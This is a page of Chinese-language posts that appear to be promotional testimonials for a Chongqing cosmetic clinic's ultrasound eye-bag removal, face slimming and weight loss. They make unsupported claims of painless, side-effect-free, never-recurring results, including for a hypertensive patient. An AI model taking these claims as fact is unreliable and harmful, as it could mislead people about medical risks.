个超声波探头在眼睑处来回滑动，将皮下脂肪进行液化，再用眼膜将液化脂肪吸收，这样就可以完全消除眼袋，并且可以保证以后无论熬夜或者夜里喝水都不会复发。

2012/03/20 14:06 l87hyng479dh

第一次见公婆的准备（转载）
跟男朋友在一起快两年了，感情比较稳定，也到了谈婚论嫁的年龄，所以准备跟男朋友一起回家见公婆。因为男朋友是外地人，所以我们交往两年来并没有去过他家里，但是我的父母早就见过男朋友，也对他比较满意。
人人都说婆媳是天敌，所以我对这第一次的见面还是很重视的，就算不能博取好印象，但力争不要落下把柄，免得以后不好相处。虽然男朋友再三跟我说，他的父母是很好相处的人，不用担心，但是哪个儿子不说自己的父母很好相处呢？所以我还是卯足了功夫准备。给他母亲带了保暖内衣，给他父亲带的普洱，虽然礼物很普通，很大众，但都是我很用心的挑选。
而我自己，也买了一套中规中矩的衣服，想到老年人比较传统，我又去把我的一头红发染黑，这样一来应该就没有什么好说的了。不过还有一个问题是我一时解决不了的，就是我的眼袋，因为是遗传的，用过很多眼霜都不见效，所以经常看起来没有精神。老人应该都不希望晚辈看起来没精神吧，可是我却并不是没有精神，只是眼袋让我看起来没有精神而已。
但是，我又不可能去做开刀去眼袋手术，先不说时间已经不够恢复就要起程，如果让婆婆看到开刀之后的伤痕，保不准会怎么想，可能会以为我全身上下都是整容过的。还是男朋友贴心，他本来就知道我对自己的眼袋耿耿于怀，也知道这次我去他家肯定会因为眼袋而担心，所以提前就给我安排好了一个不伤身的超声波去眼袋。因为超声波去眼袋不开刀，恢复期也比较短，所以并不耽误我去公婆家，但是价格比较咬手，让男朋友很出了一点血。
其实后来想想完全是自己多虑了，到了公婆家里的时候，婆婆看到我笑得眼睛都快没了，而且在男朋友家里是公公做饭，我想进去帮忙婆婆都不让，反而让老公去帮忙。我在客厅里跟婆婆一起坐着看电视真的是坐立不安，我不知道这是对我的考验还是实际情况就是我看到的那样。后来问了男朋友，他说他家里是女权社会，他妈妈什么都不会做，从小到大照顾他的任务都是公公的事，而婆婆只负责吃饭就行了，连碗都不用洗，后来他长大了一点，他也会经常帮着做饭。
我这才知道为什么男朋友有一手好的厨艺，虽然我什么都不会，但他从来没有嫌弃过，原来是婆婆从他小时候就训练了。不过我还是做不到吃过饭还不洗碗，所以等大家都吃好了，很主动的强烈要求洗碗，看得出婆婆对我的满意的。
在公婆家里住了两天，我也看得出来公婆是真的喜欢我，而不是敷衍着考验我，我的心中大石也算是放下了。虽然不知道以后会不会一直这样下去，但是有一个好的开始还是不错的，我想只要我坦诚相待，就算婆婆不把我当女儿，至少也会当干女儿看待吧。

2012/03/20 12:49 liuabcd123

不要忽视老年人爱美的那颗心
这几天发现老妈不大对劲，整天对着镜子照来照去，衣柜里的衣服也总是拿出来试好久，那天甚至在我衣柜里翻出我的碎花短裙！有一次在家里穿我的高跟鞋时，被我抓了个正着！我问老妈最近干什么。老妈支支吾吾才对我说，他们高中同学30年来第一次要同学聚会了。老妈害羞得像个小女生似的对我说，当年她喜欢的男同学这次也会去参加，她想风光一把，但是脸上的皱纹以及松弛的皮肤是改变不了了，于是想打扮的年轻一点！我听后哈哈一笑，打趣的跟老妈说：“老妈啊，你该不会是想跟那个男同学来一场迟到的恋爱吧！”老妈头摇的跟波浪鼓似的，说：“哪来那么多想法，也就是想让大家看看我还年轻嘛。”我仔细一想，女人到了这个年纪多多少少会皮肤松弛、下垂，而老妈一定也很看重这次聚会，可她那两个大眼袋看上去人就老了不少，穿在年轻的衣服又能怎么样呢。不过爱美之心人皆有之，何况是老妈呢！怪不得最近老妈又买了很多保养品回家！
  第二天我去上班，把这事当生活趣事给同事一说，同事当即很认真的跟我说：“你为什么不完成你妈妈这个愿望呢。我妈妈去年在重庆超雅美容医院做了无痛超声波去眼袋和瘦脸手术，现在还保持的很好，估计几十年都不会反弹呢。”我一听，赶忙问：“是手术？有没有副作用？我妈很怕痛，真的是无痛的？”同事说超雅美容医院采用国内顶端超声波技术，感觉跟推拿按摩差不多。我急切的问道：“大概要多少钱？”同事说：“不贵，就几千。这个价钱跟效果一比肯定超值！而且几千就能让母亲快乐开心年轻，何乐而不为呢！”我听后非常认同。当即同事要了超雅的咨询电话并打电话过去问了超雅美容医院的一些情况，电话另一端的工作人员很耐心的回答了我的问题，我自己也对这家医院非常满意。
  回家后跟老妈一说，老妈两眼都放光了！于是我第二天就跟公司请了假，带着老妈坐火车去了重庆。到了超雅门口，老妈激动地直拍着我的手！我帮老妈办好手续之后老妈便进了手术室。我在外面还是有点担心老妈会怕痛。大概一个多小时的样子老妈就敷着眼膜从手术室走了出来，我赶忙跑过去扶着老妈，老妈的眼袋因为还敷着眼膜所以我看不见，但是脸上的皮肤很明显紧致了不少，面部轮廓也清晰了好多。过了一会儿妈妈把眼膜拿掉的时候，我发现妈妈多年的眼袋居然一点儿都没有了，从没见过这么立竿见影的手术，我顿时觉得，这一趟，真值！
  回家恢复了一段时间，老妈真的成了小脸美人，而且没了眼袋看上去立刻年轻了至少十岁！老妈也每天眉飞色舞期待着聚会日子的来临！在这里，我非常感谢超雅美容医院圆了我母亲的一个心愿！

2012/03/20 12:30 erh44gfd

高血压老妈去超雅减肥
我妈妈今年虚岁五十了，患有高血压。医生叫我妈妈多吃芹菜等有助于降血压的食物，平时还要按时吃药。可是，由于我妈妈比较胖，必须要控制体重，每次医生都叫我妈妈一定要多运动，注意饮食，如果能瘦下来点当然更好，要是再胖下去的话血压也会跟着增高的。我妈妈也想过减肥，可是高血压患者减肥本来就比较危险，又不敢有什么大的举动。
07年的时候，我那四十六岁的妈妈报名了一个登山队，但是在检查身体的时候，说我妈妈血压过高，不适合大量运动，不能参加比较陡的登山活动。而且为了安全起见，只有在一些比较低、坡度不高的才允许妈妈参加。妈妈为此很沮丧，非得搞清楚为什么高血压就不让登山了，才发现，人家说了登山的时候体力消耗比较大，心肺的活动速度加快，身体负担也会变重，如果突然剧烈运动很可能导致中风或者心肌梗塞，老妈只能放弃，但又难过自己想减肥都没地方减肥。
我们也想帮老妈，但是总是怕老妈情绪过于激动，或者心率太高而影响身体健康，为此也是伤透了脑筋。不过，老妈自己很注意饮食和作息时间的，平时也不抽烟、不熬夜，现在也不再吃的像以前那么油腻腻了。相信是高血压让老妈有了危机感，老妈才如此规矩的，不然以前家里都是大鱼大肉的，现在变得清淡多了，哪怕是油或者盐放多了，老妈自己就不想吃了。可是尽管食物变得清淡了，食量也变小了，老妈的血压和体重还是没有降下去。
老妈唯一能做的减肥运动就是饭后去散步，有一次，老妈散步回来说脚都起泡了。由此可见我老妈是多么想减肥啊，没法跑步，只能多散步了。除了散步，只能做一些比较缓和的运动，连跑步机都不太适合给老妈使用。这高血压减肥还真是件难事。
时隔多年，老妈的血压还算比较稳定，没有继续往上升。但是老妈减肥的决心一直没变，一直打听高血压的人如何减肥。有一次，老妈从宝安公园回来后，问我们有没有听说过超雅超声波减肥，我们就跟丈二和尚摸不着头脑似地表示茫然。但是，为了让老妈能够成功减肥，我们兄妹两个就开始研究这个超声波减肥到底健康与否。
在同城的网站里，我们找到了几个曾经去过重庆超雅研究所的人，他们说这个减肥挺好的，最关键的无痛，做完减肥手术后也不会觉得恶心反胃，更不会有什么副作用。最早一个做了好几年了，现在身材保持的挺好的。我看他们减肥那么成功，但还有一个担心就是，人家都是年轻男女去减肥了，我老妈年纪不小了，最关键的是还患有高血压，不知道能不能做。
于是，我找到了重庆超雅的联系方式，打电话过去问高血压患者能接受减肥不。人家问我妈妈血压多少，我把我妈妈的血压如实的告诉人家，结果人家说这个血压是可以接受超声波减肥的，如果血压高于160的话，就不能够用超声波来减肥了。挂完电话，我马上和我妈妈汇报，说减肥有希望了。
那之后，我老妈就去重庆了，反正她也没工作，就是边玩边减肥，我们都很期待从重庆回来的老妈。结果，我老妈打电话回来说，人家说减肥不是降血压，不知道要不要做。但是我们还是希望老妈可以减肥成功，因为身上没有太多的脂肪，负担自然变少了，人也变得比较轻巧，本来血压就不算特别高，要是减肥成功了，以后再注意饮食和调节，可能还真的有转机。老妈听了我们的话，决定减肥。当老妈回来之后，果真瘦了好多，人也年轻了不少，最关键的是，老妈穿去的衣服都不能穿了，只能在当地买了。虽然用去了一部分钱，但是，减肥后的老妈似乎开心自信很多，人也变得轻松。

2012/03/20 12:28 liuabcd123

把握机会，把握美丽
在长辈们的眼里，我一直都是个听话的女孩子，文静、懂事，循规蹈矩。平日里，我总受到身边人的照顾，他们认为这是理所应当的。生活过得还不错。
  我暗恋着一个男生。他与我同在一个系，性格乐观，充满活力，待人也很好。每当他向我打招呼，我便会同时因喜悦和哀伤而垂下头，喜的是他没有忽视我的存在，哀的是自己长得难看，配不上他。我知道自己内心深处很不自信，正是这种不自信使我变得不爱说话，以至于性格总是处于弱势，需要人保护。但话说回来，我又有什么资本可以让自己引以为傲的呢？站在镜子前，一张圆圆的脸显得特别臃肿，眼睛又小，显得很没精神。这副“尊容”犹如一枚标签，将我的形象定得死死的，不容逾越半步。
  什么容貌无所谓，全是得利者对失利者说的安慰话。一旦长得丑，你就成了天生的失败者。我把我的想法告诉了好友冯，我们之间无话不谈，此事也不例外。她听后当即表示不满。“别老把自己看成失败者，凡事总要做了才知道，不争取一下怎么知道不行呢？”“怎么争取？”我针锋相对，“我又不像你，生来就这么美。”冯确实漂亮，追求她的男生数都数不过来，与她并肩走在一起，我常觉得自己就是个陪衬。不料冯听罢笑了笑。“巧了。你知道吗？高中那会儿我跟你一样，也对自己的大脸发愁。”“你又何必编谎话来安慰我呢？”我有些疑惑。她摇摇头，接着说：“我试过各种瘦脸的方法，都不见效，本来也已不抱希望了。是一个无意地发现改变了我。那年暑假，我看到报纸上介绍在介绍重庆超雅美容医院的超声波瘦脸手术，听说是无创伤的，心想反正也不会有损失，便去试了试。回来后，就如你现在所见了。”我瞪大了眼睛看着她，想不到她曾经竟然有和我一样的经历。冯打量着我说：“你的脸确实有些胖，如果能瘦下来，会很好看的，很多人都这样。”“那是什么样的手术？”我禁不出问道。
  冯给我大概讲了那篇文章的介绍。我了解到该项手术利用的是超声波共振原理。做瘦脸手术的时候，为了让脸上液化脂肪的排出，医生会在脸上的皮肤上开一个针孔大小的洞，当然前提是需要在开洞的皮肤周围稍微打一点麻药，不会疼，而且看不出来。手术时用超声波探头作用于面部皮肤表面，同时施以按摩，这样才能帮助排除脂肪。
  “手术前院方还会与你签下合同，进一步保证手术的严谨，这是超雅独有的条例。手术做完后就会有效果，皮肤会紧致，而且会有些许的轮廓感。过程只要四十分钟，效果立竿见影。”冯告诉我。我犹豫良久，想到往昔的不如意，终于咬咬牙，决定去试试。手术过程果真如冯所说，不痛不痒，放松极了，一点儿没有预想中的紧迫感，特别像按摩。医生还不时问我感觉如何。在一问一答中，手术已经完成了，快的我有些不相信。
  我拿出包包里的镜子照了照，镜中的自己不可思议地变得精致了，还是熟悉的那张脸，却仿佛又被精心的雕刻了一番。此后每过一天我都能感觉到脸在慢慢变瘦。一星期之后再照镜子，已是一张标准的瓜子脸，鼻梁高挺，眼睛看起来也大多了，先前好比是一张粗糙的草图，而现在则是完工后精美的成品。我整个人由里到外都发生了改变。我开始受人关注。女生们纷纷问我瘦脸的秘诀。我也有勇气面对那个心仪已久的男生了，他有些惊讶地望着我，说以前怎么没注意到我原来这么漂亮。幸福之余，我很感谢超雅，也庆幸自己当初走出了这一步。很多时候幸福的机会就在我们身旁，能否把握住它，关键看我们有没有尝试的勇气。

2012/03/20 12:27 liuabcd123

2012/03/20 12:23 l87hyng479dh

大眼袋的悲哀，有眼袋时应该怎么办呢？（转载）
不知道是不是因为大眼睛的原因，我的眼袋也水涨船高，集合了父母眼袋的缺点，最终长成了让人憎恨的大眼袋。我不知道别人有眼袋时是怎么办的，反正我在集合了眼袋家族的各种去眼袋经验之后，认定了眼袋只能通过手术来去除。而众多的亲人做过的眼袋手术中，我最看好的是不开刀的超声波去眼袋，所以就有了这往往篇我在去了重庆超雅之后写下的去眼袋经历。
因为不是写游记，所以到达重庆超雅之前的过程就省略了，坐飞机转出租车很容易就到了，重庆超雅所在的地方很好找，相信路痴的人想迷路也是难事。进了超雅的大门之后，自然就有人接待，告诉接待的美女我是来做眼袋手术的之后，就问我有没有预约。其实我觉得预约最大的作用在于涨价之后可以维持预约时候的价格，因为我姨妈来做超声波去眼袋的时候收费是3800元，而到了我就成了4800元，如果当时姨妈做完我就预约就可以省下一千元。
如果不熟悉超声波去眼袋的人可能要多费些时间来了解超声波去眼袋的效果，而我因为家里有两三个已经做过超声波去眼袋的人，所以我不需要再验证，直接就进入了准备手术的流程。准备手术的时候需要吃三颗药片，有防止淤青的云南白药，有防止紧张的安定，药片都很小，不会很难下咽。吃完药片之后，就进入一个房间，里边三角架上有相机，从各个角度把我的眼袋照下来之后，手术室向我招手了。
进入手术室之后，梁所长先用仪器把我的眼袋显示出来，告诉我接下来的目标就是把这几块黑色的阴影去掉。然后，眼袋上被抹了一层滑腻的膏状物，接着，有仪器在眼袋上滑动，跟按摩一样，开始的时候我以为这只是准备工作，后来才发现，原来已经在进行超声波去眼袋手术了。
不知道是因为安定还是按摩太舒服的原因，我在手术过程中居然睡着了，醒来的时候梁医生都在准备给我敷眼膜了。所以，从这里可以看出手术过程真的完全无痛，如果痛会睡得着吗？接着就有人扶着我去休息室，因为接下来要敷四个小时眼膜，而这四个小时要求平躺，既然敷着眼膜看不见东西，睡觉绝对是打发时间最好的方法。
可能是旅途比较累，所以躺到床上没多久就睡着了，属猪的我一觉睡了很久，按铃问护士什么时候可以取眼袋，护士说还有二十分钟就可以了。百无聊赖的等了二十分钟，护士就来给我取眼膜了，先用眼药水洗眼睛，然后在眼睛里滴了几滴防止淤青的，之后就给了我一个塑料袋，里面有接下来几天用的眼药水和消炎药。
去掉眼膜之后，眼睛看起来红红的，跟哭过一样，不过眼袋小了很多，而且准确来说，这时候的眼袋并不是眼袋，而是水肿，在过了两天之后，水肿消了真容才显露出来。没有眼袋的样子看起来顺眼多了，而超声波去眼袋让我不用开刀，又没有痛苦的去掉大眼袋让我心情大好。如今，我见到有眼袋的人就想跟人推销超声波去眼袋，倒不是收了梁所长的好处，只是觉得有好东西应该大家分享，有眼袋的人都去做超声波去眼袋。

2012/03/20 12:22 l87hyng479dh

初为人母的妈妈头件大事：去超雅做眼袋
我是一个重庆的新晋妈妈，初为人母往往都会有种兴奋感和塑造一个人的使命感，有些家长还会觉得自己好多心愿以前都没有完成，现在终于找到了传承之人，当然更多的是刚生孩子的爸妈忙于工作，要把小孩子交给爷爷奶奶带的，可是无论他们的反应是怎么样的，估计都没有我这种――去做眼袋手术。我好久以前就打算做整容手术了，以前有点点天生的大眼袋之外我还经常熬夜，我和孩子他爸在读大学时候就认识了，在一所中医药大学里面毕业后我们都去做了医药代表，很多同学都考了研究生，可是家里再也无力支持我们读研的学费了，做销售是提高收入最快的方法，于是两个人都去做了医药代表，当时我们手里也没有太多钱，常常是做兼职熬夜到很晚，我的眼袋就是这个时候严重的。后来我们逐渐攒了点钱，凑了首付，贷了三十年的贷款，一直在为还贷奔波，没有时间考虑做整形手术，后来也考虑要有个孩子了，我怀上了之后他说什么也不让我工作了，这样我才闲下来，穿着防辐射孕妇装在家找什么地方做整容手术效果好一点，找了很多医院，重庆比较大像华美啊浪族啊都找了信息，看看做眼袋手术是什么方法，因为现在我是双身子了，做什么事情都要考虑肚子里的孩子，所以每次都仔细查一下他们手术的方法是不是适合孕妇做的，华美和浪族推荐的都是内路去眼袋，就是在眼睑内侧开一个刀口，把脂肪弄出来，由于在外边看不到疤痕，所以很多医院都宣传说无痛不开刀的，后来找到一件真正不开刀的，就是重庆超雅医学美容研究所，一个网友说自己在那里做的去眼袋手术，做完之后眼睛下面有凹陷很明显，整个帖子都是说自己看到凹陷有多么难受的，下面还贴了照片，是一篇控诉的文字，可是我看了照片之后才发现其实凹陷下去真的很好看，很像笑的样子，于是我决定仔细搜一下超雅的资料，百度百科里面说重庆超雅的所长梁医生86年就开始创立美容研究所了，当时叫做天使美容研究所，也就是现在超雅的前身，有25项国家专利，所长梁医生本人也有两项超声波美容方面的专利技术，主要是应用于去眼袋上面的，完全不需要开刀，而且超雅保证以后绝对不会复发。我给他们的客服小姐打电话过去说明我的意思后，他们力主我不要做手术，因为超声波技术确实无痛不开刀，对胎儿也不会有一点影响，可是为了缓解用户的紧张往往会让用户吃一粒安定，有时候为了更快恢复还会注射一些药物，他们很担心这些药物会不会对胎儿有影响，况且我一个孕妇活动起来也不是很方便，我自己想想也是，这件事就这么放下了。等到生完baby的时候我就一下子来了精神，刚刚有力气下床的时候就给超雅的医生打电话，看能不能做手术，可是医生负责任的告诉我说，虽然对身体没有什么危害，可是超雅不主张哺乳期的妈妈做眼袋手术的，这下真是有点灰心，等了足足几个月呢。后来等哺乳期一过，我就坐的出租车去了超雅，可是等我到了那里才发现我要排队登上很长时间，由于没有预约，而且是在周末，护士小姐告诉我说排队已经排到下班了，可是我说家里的孩子刚刚睡着，平时脱不开身的，梁医生特地给我安排了一个时间，本来应该是他休息的，给我做了眼袋手术，以前在网上看资料里说梁医生开立美容医院这么多年，而且拥有这么多项专利，肯定是很严肃的人，结果在我面前他竟然是这么温和，一边和我聊孩子的事情，还问我在什么地方工作，做手术的时候动作缓慢轻柔，让我感觉很舒服。现在恢复的很好，老公也觉得我现在好看，还常常抱着孩子逗她说，看妈妈漂不漂亮啊。

2012/03/20 12:03 l87hyng479dh

分页： 6/22